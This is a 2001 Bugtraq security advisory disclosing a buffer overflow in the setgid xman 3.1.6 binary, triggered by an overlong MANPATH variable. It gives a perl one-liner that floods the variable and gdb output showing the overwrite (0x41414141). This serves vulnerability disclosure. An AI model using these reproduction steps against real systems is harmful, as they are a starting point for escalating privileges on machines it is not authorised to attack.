[21502] in bugtraq
suid xman 3.1.6 overflows
daemon@ATHENA.MIT.EDU (KF)
Mon Jul 16 00:17:00 2001
Message-ID: <3B4D1A61.F1681F89@snosoft.com>
Date: Wed, 11 Jul 2001 23:32:49 -0400
From: KF <dotslash@snosoft.com>
MIME-Version: 1.0
To: bugtraq@securityfocus.com, srtxg@chanae.alphanet.ch
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
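xman from at least X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic
buffer overflow when the MANPATH environment variable is overly long.
Note that the listing below shows the binary installed setgid man
(-rwxr-sr-x, root:man), so the overflow occurs in a process that runs
with that group's privileges.
srtxg@chanae.alphanet.ch is noted as the packager of this RPM. I do not
know the author.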
[root@linux lib]# ls -al `which xman`
-rwxr-sr-x 1 root man 41076 Jun 17 1998 /usr/X11R6/bin/xman*
[root@linux lib]# xman
[root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
[root@linux lib]# xman
Xman Error: Could not allocate memory for manual sections.
[root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
[root@linux lib]# xman
Segmentation fault
[root@linux lib]# gdb xman
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
(gdb) run
Starting program: /usr/X11R6/bin/xman
0x4022fb66 in getenv () from /lib/libc.so.6
(gdb) bt
#0 0x4022fb66 in getenv () from /lib/libc.so.6
#1 0x0804bc47 in _start ()
#2 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
(gdb) info registers
eax 0xbffee784 -1073813628
ecx 0x804fb29 134544169
edx 0x805414c 134562124
ebx 0x40328f2c 1077055276
esp 0xbffec6fc 0xbffec6fc
ebp 0xbffec714 0xbffec714
esi 0x6 6
edi 0x41414141 1094795585
eip 0x4022fb66 0x4022fb66
-KF